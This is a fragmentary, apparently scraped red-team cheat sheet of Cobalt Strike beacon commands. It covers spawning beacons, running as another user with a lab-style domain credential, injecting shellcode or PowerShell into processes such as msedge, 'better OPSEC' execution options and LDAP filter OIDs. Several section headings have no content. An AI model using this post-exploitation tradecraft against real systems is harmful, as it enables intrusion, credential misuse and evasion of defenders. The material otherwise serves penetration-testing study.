Enumeration
Session Passing
Spawn New Beacon
# Create new process and inject shellcode (ensure listener exists)
spawn x64 http
spawn x86 httpSpawn as Another User
cd C:\Windows\Temp
spawnas INLANEFREIGHT\tmorgan Passw0rd! tcp-localProcess Migration
Stay in processes that SHOULD have network connections.
# Spawn windowless process to inject into
execute C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
# Inject into the process
inject <pid> x64 httpHost Enumeration
File System
Software and Services
Drives
Keylogger
Clipboard and Screenshot
Registry
Job Management
Program Execution
Command
Description
shell whoami /user
Passes to cmd.exe /c
run cmd.exe /c whoami
Executes program directly
powershell $env:computername
Direct PowerShell cmdlets
powerpick $env:computername
Unmanaged PowerShell (better OPSEC)
psinject 19508 x64 Get-ChildItem C:\
Inject PowerShell DLL into remote process
Import and Run Scripts
Execute .NET Assembly
AV Enumeration
Local
Remote (via WinRM)
LDAP Enumeration
SIDs
Domain Users
NEVER RUN
(objectClass=*)
BOFHound Compatible Queries
Group Membership (Recursive)
Bitwise Filters
OID
Rule
1.2.840.113556.1.4.803
LDAP_MATCHING_RULE_BIT_AND
1.2.840.113556.1.4.804
LDAP_MATCHING_RULE_BIT_OR
1.2.840.113556.1.4.1941
LDAP_MATCHING_RULE_IN_CHAIN
Last updated